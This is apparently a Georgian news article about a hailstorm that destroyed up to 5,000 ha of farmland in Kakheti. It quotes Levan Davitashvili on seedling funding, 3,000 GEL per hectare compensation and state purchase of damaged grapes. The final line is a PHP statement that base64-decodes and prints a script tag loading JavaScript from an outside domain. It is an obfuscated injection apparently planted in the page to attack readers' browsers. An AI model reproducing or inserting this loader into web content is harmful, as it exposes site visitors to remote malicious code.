celsiusi
ავერსი შნაიდერი
კახეთის რეგიონის  5  მუნიციპალიტეტში,  უპრეცედეტოდ დიდი სტიქიის შედეგად, 5 000 ჰა-მდე სასოფლო-სამეურნეო სავარგული განადგურდა. მთავრობამ მოახდინა მყისიერი რეაგირება.  
 
,,ჩვენ გავაკეთებთ ყველაფერს, რომ სტიქიის მიერ მოსახლეობისთვის მიყენებული ზარალი მინიმუმამდე შემცირდეს. მნიშვნელოვანია, რომ დავეხმაროთ იმ ფერმერებსაც, ვისაც სტიქიამ ხილის ბაღები მთლიანად გაუნადგურა და მომავალ წლებში, მოსავლის მიღებას ფაქტობრივად ვეღარ შეძლებენ. აღნიშნული ბაღების ჩანაცვლება-აღდგენის მიზნით, პროგრამის ,,დანერგე  მომავლი“ ფარგლებში, ფერმერები სრულ დაფინანსებას მიიღებენ  ნერგების და მოხდება სარწყავი სისტემის თანადაფინანსებაც.
 
ამასთან ერთად, მთავრობის გადაწყვეტილებით, მევენახეები, რომელთაც სრულად, 100 %-ით გაუნადგურდა ყურძნის მოსავალი, ერთჯერადი კომპენსაციის სახით, სახელმწიფოსგან 1 ჰა-ზე 3000 ლარს მიიღებენ.  ფერმერები სეტყვისგან დაზიანებულ ყურძენს - 1 გკ რქაწითელს 80 თეთრად, ხოლო  1 კგ საფერავს 1 ლარად  ჩააბარებენ. ხაზგასმით მინდა აღვნიშნო, რომ დასეტყვილი ყურძენი ჩაუბარებელი არ დარჩება. დასეტყვილი ყურძნის მიღება სახელმწიფო საწარმომ შპს ,,მოსავლის მართვის კომპანიამ“  27 აგვისტოდან დაიწყო და 3 სექტემბრის ჩათვლით გააგრძელებს. დასეტყვილი ყურძნის მიღება თელავის, გურჯაანისა და ყვარლის მუნიციპალიტეტებში რამდენიმე ლოკაციებზე  უკვე შესაძლებელია. ყველა რესურსი  მობილიზებულია, იმისთვის, რომ დაზარალებულმა მევენახეებმა მოსავლის დაბინავება შეუფერხებლად შეძლონ. აღნიშნული სტიქიიდან გამომდინარე, ეს იქნება ადეკვატური პასუხი ჩვენი ფერმერების საჭიროებებზე.“, - განაცხადა ლევან დავითაშვილმა
1008
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");